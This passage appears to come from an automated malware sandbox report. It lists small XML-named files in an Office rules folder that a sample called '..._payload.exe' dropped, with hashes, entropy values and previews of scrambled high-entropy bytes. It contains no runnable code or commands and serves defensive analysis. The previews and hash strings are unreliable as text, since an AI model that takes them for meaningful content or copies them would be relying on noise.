                                                                                                                          Preview:<?xml.i...a).|_/.\.KN....>.....Vy5.(Y...8..... z5.<.F%.P....b...8[IQ...M.?...)4.i.y]..,.Z.1.d..#.......i>".v<\.jb\t...uZ....3.V(.h3.]\....o..........w.M..s...;... YY..W..8...O...!uVE..*x.......5z.....AYw...*.........zE..f:.4.t.....h.&.w.am....r...6.M....*a2..Z.7d.....'.v,t.s.w.5.@.5jZiJ.~..oQHFU!..?./..PfF.f.e.R^...Xm..!.....mi.@d.QUDJ.+.>..El.G....T ..T.."..f....B......2!.vQ.B....-L..."P.l...7....`.D.Y.G........:..{.T[D..v.._x..!..^D.@..K<?....?.Kz8o..0p.7..f.R...^...j..H.&h.!..`.....-2...t.{..2n.jnv.-.}..@!...s...W../.U.K`.O..a'..t.P".......>..`.}Z.(...O.;R....+7..9`...N.O6.Z.9.;...!R.H.-X...D.w..o{...r.{.Y.L.j.8PUc.1QPA.kD......_1K...>..2X..^`]".. .-... ..N.lN..f...5..`/.z!............X........4..7......C!.l<.".m.d....(.l)dY.=..c.....x.ke.d.QH....2V.xf......N..:.N.W. ..p..i..^'...........I.|...(!...........i..XI.`....B....o..\....._...4.V.......Jp.!=.u.O....w..a.c&..m.,#3..)..ynv.(...x.&.a.[...$-...v..Yr....y.>t.b..a...`..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701401v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.884763787770073
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:uI7khy7zaH3y1j9gxMawLxyUU50s08od2oSfmeKSUD:uI7Qy7zaH3yrgChwUBb2oSf0J
                                                                                                                          MD5:4938A02D17582AABABA0F16D2A675F18
                                                                                                                          SHA1:C5A45BFBB7FB30F3B5E999A57AB98D1D0F04E66F
                                                                                                                          SHA-256:7490D9EE1177D503E425893F354CDDEB85A2D712D502065DED812D92A44E8056
                                                                                                                          SHA-512:E73EAC25BE881A3DC157AD48449C4066FC6C39792D83CCE7610E45B4F77656CC5C4DC42B1CBE5A33A36A31A888E945CD6F890E305C25BB2A4EA91CE242966E29
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....W..h[d......oQ......../...6..HE.e...C.*..8.I.9....>..=f...;).......Coy....3g...c..b..gm.b........M..2..!..4.p.jE....w..5........p.-...H.b......a..^.y[.-.@1.P.}.Q.$R....3......)..Z`..|$./.......D.T..>l.T....a.j7....x...+.p.'....,..]....f...B..1..z.....;7..D[.:m.n.})..vQe.L .;(.qq..m.x.....<_Yh.v..'.!.i.....'..`c...V..^.>8.7.C..Q..-.....X..5....&.....3..tI..^'..c.......DNY..T.s..... .H..I..OSL..e...N..O_...R....sU....%..7..a..`*..}z.D..:+A.zC>;3.#ij..2..w.K`.+T.1.%...5.VA`.Zk.c..}.X.O..PN!.~...=....;.W.fa..8I.e.^..i<..X....Bt..Hh[."..MK......(.k.)..0...k..X.....vJ...(...h..}3...;..n.X|;.<<u...#....s.=.{.~..[H..pY...A..Iw..6:.-.Q...X......P.xB)......q.B..5.....23.u.!.|..2.j.L......b....FR!...{<.*H.KB.>..(B.S?....9....D.$..Dm$x..dN.(...krGC../}.y....}...!...U.l....8>...|.[.$....^...tL..q!GCbi {..Y....@...Q.#.D...c....h4.I?...........L..)..;...K.1)._<.).W..7.........M..=.(!.8W..0=$>G."#M...@....{........na2........v...x&{9..qC..M

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701500v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1697
                                                                                                                          Entropy (8bit):7.884691013206788
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:aEIzJh8e9zG4Pb7I1gG22yQwH4G25NgCpAwD:QJJBGys1T2Fp4jNZ/
                                                                                                                          MD5:4D8320FA39EBEEE100A94BE13D04B9E9
                                                                                                                          SHA1:26A5487DEC7245056F0854E0AF7BF3D554508225
                                                                                                                          SHA-256:547DD8FE02761CCFD6E9FF1342032902F36FDE6EE3D4F88F296A2EE999E38EFC
                                                                                                                          SHA-512:AFD4000F6A90CA5CB62A68B2F2AD9809675888C9A9518F6ECE4979648AA256B96D1768DA562EA3BB494E6F1742EC2AD074586AB097CF19F55BA5AB58AE16E7B7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..viFQ.<}..o!E...P@T...q.h.c..._..F=M..%.Y......\=.W.B.q.Y.Z#......b../.~...B..,..>1...U......v:a%.....l.<../....9.2Q.....}...nNd......a.............e.Y...t.......(P.o..~.DUjw@........X...u."U...8..3...C.)qMM.0..-..^.2..........d>..z.Y....r.B........#^.%].H.g.Y..D.../..Zi._..3F.Q...{.s..a......"^IRV-.aYY?.8.:.E..8..t...5..7X..KV.'r..'s....8.1."z.L......`.*|.N*.9%..|c.b.6.....V}..N....V.......g~.6.r..UH..8....b.f..4.E6p........)w..1.)i...?...w..NyY..jD..%?i.q\....f.nM.W.o.....<..W7N.1.Y3....AF.._....3.Z..\a3Hn....nE.6.#i[....#}...aW.e....e..r!R@|..p..9v..m..s...w.`.A.kE:..;N....=TAmQ...s..U..|.}f.Y'...1J.FJ.NP.Q.ba........z....n....+..Q..{U...2S...`.|Ih..t....j.........T..@.j...K.e$...&...@[.Q....C..!>....!..t..t.K..=.]..g.W.i........fy.j8r...}..x.g.'.O[.....89.4...X~.asO.L.'.........,CYK.3...~...KBO. ....a............vn..}...1.1 :v.i.b.SI..Q..=..HT.1h..P....>.3.+.. ....n....V.5{...O2......&...bEYt...p.4.......+..`...U..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701501v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.8895855540337365
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:f0xPsq9x8DmlnHRJujXpl1a677vFTIjwPD:f0B92D+Jw717HEO
                                                                                                                          MD5:B0AF270AAA627CFF76395A1144A425D7
                                                                                                                          SHA1:0691412EC2612D26BC5BB590D7619C37D988B7C7
                                                                                                                          SHA-256:DFEC205D0EF7A4B013E0B68CC39AEF88EA7AFD2793B619DD7F6DCB6EF6181F46
                                                                                                                          SHA-512:9764DB25ACFC213520ACE5207CB3F8EBF5952637A3BFAB3CFE81A87A9D347FB74A63D91C8DDDE0638D059346D0F880D620FBEFA0CF67C3AD514E64923F0CB02F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.U:o.......4a......\,.&.i.X..S..._b.(v.U.imp..|G.3.y.#.1."CDg........b.M... V..!bs.of..........c......!...OC=..T2l.u.8.Z.Y.0......Y.vu..f..$..E..&..jJ.. .f...Dw...../Ka..u.../.xa5j`.v....B[..k.......G_...m.....*9.q.%y..K....K.rG.....G.1....H3Kl..;\E..b$..'?0...\EU...C..PU%[.. fm...D..`....m......."].ikB..e.9....}>....&P.ZXG+..Q[..o...v.6...s.=..JYRT.P.S......{K..f..:.U.......",/.RQ^....C...Y/....@...M...s1e...d.B).CQ.y..=9Y.Q.-i..`g.E.&.t....._...D.......J....0...;T.U./|6.j.T.A.)!l..P.i..4..Y.p,.S:.)<.6..r.S|=.....K.>E...CR.}:..FM...M.f..G.Q{~s.....(.$e.a.zk*K..g...L8..yy.p.7..W..\!I.-F_xt!u0R.x|2.8.g.[..?......K..-KU.+.....f`.v...S....<...N6{...k.:..........kbVivAD...=......a49r...t.{.A.>."..0*>..B{.:........S.,F\@.%`]3.J....+.LY....p1Z.%pu_.3B....Y.......?of..3..j..Z.X...s..N......H.>.=.ZphC=.....x$.........-.....,..y.&.T..1.G..2"....?.../.^.(.Z...T..~.c.......T A.U*..^.....$......9..J..b.....ul].I.......m..|.4zJ.c.u.~...U.;....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701550v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1701
                                                                                                                          Entropy (8bit):7.879614666198084
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:iEuypo5OwJTvSF/yX0F4+xZbbZ1K2YZj0/i0DOK4pphDrqD:iEuSnF/a+HfZY2yI/6jb5O
                                                                                                                          MD5:3DCF2794AE08A48A175B714146554632
                                                                                                                          SHA1:C8B755F7983F55A663A2B16B2FC9A42D2F7EF586
                                                                                                                          SHA-256:11BA0BC29ABFF1D39A62FDEC65A360243D7004E0E0CAFCD3DABE96BEDE1DB7DF
                                                                                                                          SHA-512:4BC7633A9FC1AF354EFA228EA6CEFF9B684944542B61258C2097D7A556FC9E737ED1114F4444518125A68CB1A69610F7FF56BF1BFFA9A889F110992238FC297E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.[f./.T.....tZ..U>.....Z.1.;wYDU.%f.D.U.f.7.....G..]....LF....MO^j?u...'8..R....2;...d.A.<g.(mw..Xk..m......n..3D..%...i.N....[B....o;..;.eY.s.w..!5.Y= .U.A.]..7..gh6G..g...%..K..<...:.-'2?t..8D..j..'..V@/..l..j....{=.i.@9q..Ql..L....:z@..Fz{...#.(...Fh?_x,...U..7NW.&.T.4..*.....$L7..<..$..E..|)ma...'+.../.c.{...q.....j|...#@..AV.}".X.3.H.....5....ge..&.!..TQ.....t..{..~....z..@m..4.v.kv..?.'U(..+3=.a%'...:...'.....8..B...........TA..._X.~8.v2...,x.....kDaK...n...d>.J.0...%...M0..g. .5\..K.r...n.H+.h..%l....EUbx..DB.U.75.%....'q.,...X..Y.{...H.....H..19S.....}. $.....q....#A0.`\p.sq...$..n..f[]|....'.Y....$..P..r.$y..h...d...Q&mzb...O%.lM..........I.....CH..O...a..I%.v.iH..-......&.rz..{...-....?.....Z....I.T..A..3..ls`.:..N...;.Df.&.=..&..2....U$.;...{..\.\L2.]<"kD..[K'...]..n.ED}."c}3]........G....Du...T.. Zp.2y....dq.k.!\.j.x_.\............1.n..>......&.M.<z.1..)....kmSN.Cx..;8.1.)..L..%....[...~W..y..UG&....2....n......,d

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701551v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1738
                                                                                                                          Entropy (8bit):7.878274353222686
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:UwQyosbzSXcwn+c2lCZUReIoRBuVMR4fVqGz0W4o4w25D:UZebC2lCZUUIoRBuVM6YGB2x
                                                                                                                          MD5:C0F04A26F1D94344F45048FD87093710
                                                                                                                          SHA1:3596414E559BCE44D3120BE2D1B103B22F2F2D18
                                                                                                                          SHA-256:EC514243D34C9424F44D7E62FAFC083C116BB9321D4DA3C97942CCBB8691DFB7
                                                                                                                          SHA-512:2D6BA06FA15E81A70D94B00DC9274BB33669927C40B7842EBACADF30141AE7F8C4BB4580D87A58C183B655FD23B23F27BAD40A4B348C76FF8C70BFCC81412BD0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.s..r..ZZJ..fsO1.E.g.6..........o.J<.....B.$.`{..7...EE.T...2U...'F.c_.Z...x..lf..mXL.c..m.....W..l..W..es....!.'.....;dm.d....Q..E..z..&.W........=.,....0)..7p.x9...!.~y..}x[.x.<..........s...u.?.|.=K$+<.q.P.GpH...X..J..IX..<Z&<`H..=&.g..AZ.5)m. h.yO......\1.s...pHhG...*3.......*...]...`.J......W2.....DX.P...y...)..YO-<e.|..."......gq.YBP.s},.. oW..+....U.e.?....K.....-=.9.}..p..X.B.._....L..."...m.LH.)..<..,.DU.\.j>v..Y.N...\.l__@..|.......j.f......C....5.P.tLK...C....D.....A.}......`..q.p...^1E1Ie|C....9..^..`.6ny.]N.>L..]T.[g.#{..6......Gi.S."..q..j..g.m.....L..S9qG!.....\..]..'... .......c....x\.......z...'....L[..W6F......D4.&..^...O{hj'G.=.:.q..x....S.....1M.^L.=R........U..HCi.jWfy..3\m../~.e............h..IeB&K..@......*r....s.{..K}x.CU.%R..Ec.......q.R.....\7..BI.....-....x...#...;..|...Y.8.....2..U)..$Q......R...l.51Y..C...P..c..?.bv...:..a.Zg.z..1....J6V......YS.j.....w)b..zo..}.&|.^..h....:..O!.l7.S...\.;

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701650v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1705
                                                                                                                          Entropy (8bit):7.871367950395414
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:3VtH8IOdGT2rVljSAZl9f/lrde1Tv2jBD:32BV7j19ri2jp
                                                                                                                          MD5:3495131EE037639B4E908B1A474FD502
                                                                                                                          SHA1:7D7CDDB44BB2689AD55877C330C1EDC510A0A1FF
                                                                                                                          SHA-256:8A94E82EEEA56E1247F21DE60AC4B8341964B734445BE7E69FBF956D470D3BC6
                                                                                                                          SHA-512:B7FEEF019E4EE55163A01FB73F4CB8913D5C8DDB56FF467D034BD0B37D4E0AA43CFC89DB173DEEF7832D31F13BFC4F5D648684218E888CFB121C735140560294
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......!..* .JA=5L/.....c..C_.`B..Q..dD5.....AI.....eE..[.n.O....@...... ......h....x..K.._.3.H..l......V....Q.......h.F;.8........X".4.Co...9g.ls..h4...o{'.....P.o.!0|..)...S&./Zp.%8...Y....z.....F.LP.|.r.&Q.tj&.. ....f..2.r..DP....I~f<>..|...E.g).H.~....HLM..\..]..;E..@V.I.}.^J$:*.Y[...S.....Y.n.'.$4N.......1n..K.l...+.+s...r..,.-@Bnk+..O?eA.L%...B.....gI..s{....c....T..r.w..jS..46...g......aG....n#Pn.nQ.d....O.o.c...7.G.....l.'5C.."3.'...=...&/..<...t..&.4..l......(.#...1l.PY'\...K_......0..4t(..2Y...\v.7...W..=....|..v!..98...7.w/.m...<...i....0......_.....N.o...=..:...Z8D-x?...e...1..0...ig.H6X...m....X..a.D.z...a.Z.RA.=v......;..H..RA..:V.NU.4.U^.........=n!...>...<.........W.H.dL..=*..)H.G.;F....9..l.N.]s.Ao4.&..\.t....>..J&~..1b.*.......<;....k.,.....n3......d[.p....X.9..B.>.7.....r.ud......[.\|..3F~.t..g...C...%@.[....t.6...]..4,.^.y.`L$mi.....w.y........2......o .I.B.7O#...$..[.PP...s.`.#..+F...g.~.)#..@<..M..M=<_...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701651v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1742
                                                                                                                          Entropy (8bit):7.88716579484488
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:5H4VfDTB8+ouQlwVoUTu6I+8CowzyQyZHRXDor9D:NDjKVdy+8CoMyQyZHRG
                                                                                                                          MD5:275A36D05479C39CD864A10CBD732F10
                                                                                                                          SHA1:BD94AD3C1DC6C7F9452D19C227438144B3743FE1
                                                                                                                          SHA-256:AFA95C7082579CA022B7E1A9A4A9068035A82ADBF14B6AE2A501FAAE550DDDE4
                                                                                                                          SHA-512:53676579470E3DF7DCE9C53552AA48D9DCB7DD1AE83A7A35AC665FAFE6EE3A41B207690707488A4C5A3663413FCE57D596798B6ADC861F74BC6FA6635B6BA2F6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..= ../W.eA-...2....{.......<%.p.C.;..).7B.........*,..m.F......@K...R..........t.Gs.V|...w.....G.7....A.J*.N..s.(.[?.'R....e2w...7..J.;..K..i6.hn.:..Q..~1w...$....2N{..T|.M.s......0i....?~...GYti.D.b.B..p.!.._......7..i.Kk...9.j.*....=.|.......nd..80qrK:k.....\.(e.c... ...d.....W@^..z.f~.5!%....A...m.I[P.:,.=...)...!./+..D@... ..Z.!..VY+..E6.9...$R.=...ml.A..a;*...R.:N..^.T...|W..F y........>Ec...(..9.s@.3.g.]..U.......)[.Q........&...a.&.YS!.Bp......f'R.4......$.5.Q()8..v.q$P..xAe..9|.%....*...L{._`...YP.4.6C..z.t.b.}.../....G^..6./~.fd..ps^L....|x.p...}..`8...#Nk.....dSF .....Q.c....u.X..xe..N...s..........[.'..b....[.....N.s./.Yx..W......U*g=]j...8......{....C.5.o..>....<c...m..h...b....JzZ.....`...........z.4'`...........p.6.RcW...ik......mk..f.O.'|.He..5..!4....|./w.-...].......0.z....v6...[.(c.......jD.bJ....o.lS#,....pE....`0..v...K.....b...X..W.X.......[.7..._}..#.....f.=|.~w..%2....tu=1F.aK3XV.G...M..=...y<....e2...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701700v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1719
                                                                                                                          Entropy (8bit):7.874952013971613
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:JWrRnaT9gYVO1HAjV8Ml5hRyG0UKZzc6T1Z8xptb7jJ8LD:JkMzV6WPlZyoL6b8xdM
                                                                                                                          MD5:5FD78F45489160D734AC55F1AAE9201C
                                                                                                                          SHA1:DFCC093C4E873CB470BA628BA19E89E414D3BB03
                                                                                                                          SHA-256:1C262AFFDFA7C2B4BA39A7D7FD0F3BEDA8EC670CA1DF2DEC06791FFB58F18331
                                                                                                                          SHA-512:EBFF6C1CF3948055D2501728D4E60CD3B7FF019E1BA11B41FF682CD0E7E0D866574649666E18EC430C14D983E6D6E903EFC50BAEA2974828F08CE5AD2DCC4CAF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.{.,.L.eO..6T.(/...0.@.=...e9f..Y....o6@.U.A._F.l.]h.....:).....P.}..3cq.r.._....l.w..$.....f....bS...ST..._F...E.U".r..w.Q+..j.}.Rf....x.....vA...?.4h..vc....m..>V..).8..FZi..Y...y.[.9hY].X...C^ ,.S.l.'.........5n2....$.f..k...).!.=...|^enY.R...w.Q..'..3v.9.G.....x...7C8x.?)....U.[x......K...:1.Tm.c&a.g.*.$~W..L...^C.P.....G%........'..9.l.NA.^..........m.....^....0.v&..8.%..O6.b..?.g.P.........B..D..L..ei..7....}.t$U.....F.S.E.C..s..+..1.....Z...B....wF.~"(.p.O.U"hx .q(....#l........=Di.9dy..(d..L.u...,.....x.p..jebT..0...x..w......?h.7I.o..&TK..96..`w............O0...A.....J\.J;nO.......*.....1........R.......&.........f.C..@.B..X...q..........t...eR3../.9.......Q..3.W.Q.....k...$.nz.nt...i;.a.HL.{.....~.. ...Q.......y(........"&.XJ*:....R.<.7........T.......Hk......5\...4w......^O7.PJ..`@(...5a...U...H..{O.\....o.&......%..:.F..n)x...,A...p..7.).F..^8.1..T.lq...0...Z...<Y+..{9T>...-C.2.*.{.y.N....i4..Tj.Uu.C.#T..Y.BH....._...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701701v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1756
                                                                                                                          Entropy (8bit):7.8839367567430605
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Q+eaZLbnKHf1k3wwmMarHDw7EkggM6Mm07KVNA1TMeD:LJnKGghMav2i7KVs
                                                                                                                          MD5:28D0B6A43B1B6B400F8509FB61BF7611
                                                                                                                          SHA1:4D39F4E795F316E6B6D01817D4520C4D12CF5778
                                                                                                                          SHA-256:519E6663D42B1C3D5654B16BB89E15C442B4C15936F8F693D6490A69E9D2FC7E
                                                                                                                          SHA-512:E3D268DC97484F57E3770A3D6A2F1A57EF93597AAB3B3CA37360358E3F3534F41E8FE8E478E20E4D49A8780F5DFE81C912406A302CC607C47249E0E9A2E42ED4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.(se...m:......9..F;..V!5..y.....Cq..~...D>...sZD.....31..+..B.&..C..y..MI..._../........g...:}.Z.EB.H-Bq8.....K.x#.Kq|.u.i...a5L.r...!..t../.e....LiN].N....s.........N(..+.0.*4..$H..^4k.(,...lG<......(.x..6..Y.6.$... O...0....a6.....\..x.s.%.e.E...6..e....e...p_.;b...-.\S].........b. ?W..%~f.Z....a..)...w.9[.....@.8G.,.N^..~,....s ..0.kd~..jUa.Cu;5T..^...o`.P7n_k.D..12..W....B.TzM...y..N.H...y.h.1Q.?...cvK...C.j..aD.F...D~T...{..$Z=>d..Vn~%.B.k.'.J.}.?.K.@.7u.....-..W.h~o!G..sQp......V...,...\M=j....{"..f...'7....._ki..-...J.L.Y..E8$....T...b..`^...0z.U2..Vby.P.......v.AH.&.....1.~e.........>A.O~B.'....,.t..V...u..p[.2u.:...o..5....'.....L......k$58....._.S.(..i.%.y..}.....G.5C....g..jOnDU..DE..."%..o.h,....4.wA.1...R..4...8....8.&6.'....>.Ph./...P.L.u.K.e..I..y..i3.%zj....?.?XZ.U...Uw...?......I...KZ5.P..........c..2.V.8.6;f.W.x...h.EO...+bp.....4..4...,/........Y.y .*.9.c..u.nc..Q:6.C...xL.S.nX....q"l..l.:?..'i...SMq...0.DIf.U

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701750v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1697
                                                                                                                          Entropy (8bit):7.886707854978661
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:0oCbhdKPwROS8iRFkIJJgW/q1dYuGsMB4zzixFh+dzBTYsgfiioA9iSlPY71ibD:kRLfRaIJOOyuwVBc/i1yeSD
                                                                                                                          MD5:BCF1ED704E674F9CA1C9181B8FFAFA10
                                                                                                                          SHA1:1B9EDB8E300782B3A3B2DA7769C9DBDF92D49FA9
                                                                                                                          SHA-256:EC88A34C54110A1F932A6A083CDFD12D077CDF501E050910CCF0F465A518D178
                                                                                                                          SHA-512:2708842D49FFB7CC89643D1CF882307D295EE8B8C35168304CE70918EE759E425C99D381897D5D2F6226F461DA06EDE8F9D62FFEF0C3EA9BFF13D13056282037
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlr.ZP.1.....4.n9-q...H.../#.}7#..]..,>..gu.~...!".p..m.J.;...(}..-....0....7.(s...\...f..N.8Z"....^.dM..Eq...r..z.:.......[........=N..n+..=.s.b...6../..|..c^p..W.p.....-h.m.i...j*..l.............!.....SP.t.w...R....O........|.#.S.mXX....I?..e.!.w;x....<.6.UlJi.x.m....K.*m.s.D..y.6..k.......1..........R...l..!..S6..r....^...1Y.^#)CA...]..V...f..1.".8P....`Vh........]z.^r.......;...Nin...H.%...b.....Z...;....G...s5..QCP.L....`q.+..v........&..A7.ob....&.Z.Z.99......3.|...`;.....a<..nT.........mZ..W~Oz.Z..z..2^lK..mbWv._.p...=.h....f..4........m.R.Y..f].... ......D....P...[..N...LX.~.B.61?..48.-..0..a.....D..D5...d.(jO ..|+=.a...I..B.9..F..y...*...~..!/.{...F.-..Z@O(.w.....e5..&.]U..g.%.^=.^lw.H.S?.........A.N.`H..+>+.....%.....C........P.:.....Z_...=}...'.JJ.|.Q9.m~.B.Y..J.<.[.M..+.n.`..t!...nD.D.,.n.....l.h.fC(TM..\M.h.>.J.....f;..g8./>|...........r..F...h..nAd..!........x..o.|w.Jm...nl.`.....t....X0..F^F^M..`..@6

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701751v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.885560853016453
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ieUxxft2tipdTI6MjPiX2eSJsELMu2ggZ77FJLAIJ66Ojo6hw147oVbRXSbD:iDYYIfjPeoihggZ7BJLAP66hw1dAD
                                                                                                                          MD5:504B59B04D45748EB62EAC05AB5FF699
                                                                                                                          SHA1:E692C5844734AF3E8C47513A698B2251B7CB7AFD
                                                                                                                          SHA-256:A458595098356E011FEE36C80EBC030F0A1837D31732CB9DC3FF53E680B9ED78
                                                                                                                          SHA-512:6E3E09999D4EA53EE1C62EC8DC2F9670A1FDF8F87E3C8E98F71935D12E6106D95EC906D60B309FD1F7E1802DE70CBFB8D61B5A27F486DC78BB0DD954F3130B78
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml."..^..e.J*....p....Qf..?...[].,...N...,.... ..\..x.....A......k..o_......6...#.Y .Q....JuY..x..|.d..V...T..U.$..5jy.0k.......u......ay..G.['.$\%t!.F".?.."p?..]..[......./.c.o/.l.Y:._..E..Q.U....E%3...l.....Y...m....Xbx......G......$...-...n.EZ.AE..R....3.....s.6q.5.|H/...Wf.E..NY..............wd..}..^:.;....HD.<=.~.`<...D._..?....mv.....6S.Z...rk.q.s>..._..%..S.D.O.v.[\Q...>Zv..[.H.V.07d.d.)......:.U]D.#.yu.....Cf-i..:M'HB..z.A..Ga../BbZh....).9.91.......'20..-.......?..MVEE.Tc .....m.q]r........U...Gx....Y=.v0.^.....i.!.L.:Tw..........6HA...p..../...d..3R..<..Cn...&.1.;d.j}a...S...'..D.~.....7....n|l....ET.;..s..sz.....qj&.-8..g-.....'.....6....:....Z.....Yj/..!.Q.4.(a.E.}...;q..}p)....a.._<.qs..4..FA..5~~~~.....V../l..u....r.qp..An..p....G.....m`..`SD.*..D\.hj.8..t-W....h%.....r<...5...'.Y]............n.:..<a.....m`.....K..;.b..i..g:Fi..^.....]..U.P_.S....Y.u.<8.".5*...n8.......#/#J...$..B$.c;chc.z,`.P...Y...`...m....t.B

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701800v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1699
                                                                                                                          Entropy (8bit):7.869120614797976
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:yauVmOrOKJsMAaySTTFtUD/sqK4/Cyo0bcaHKD:Xu8OrOQAQTPcO0b3C
                                                                                                                          MD5:97BBFD4E48AFE8A5C5723F3F21D3E384
                                                                                                                          SHA1:455A11900D87BF381785FEB0B38AE586A5AAF403
                                                                                                                          SHA-256:496ABC0D38F85458A40C0214079481AF31EADE3DC1B2F598B6C97CA0F8639AB0
                                                                                                                          SHA-512:F77FC3009964DEC8F50716FEA2B1972D129FDFA27C66404AD83284CA23160AA5001EEBE4229E3163DD2587191CE30446F8CADFC71DE369EB6C7F9E670D89802A
                                                                                                                          Malicious:false
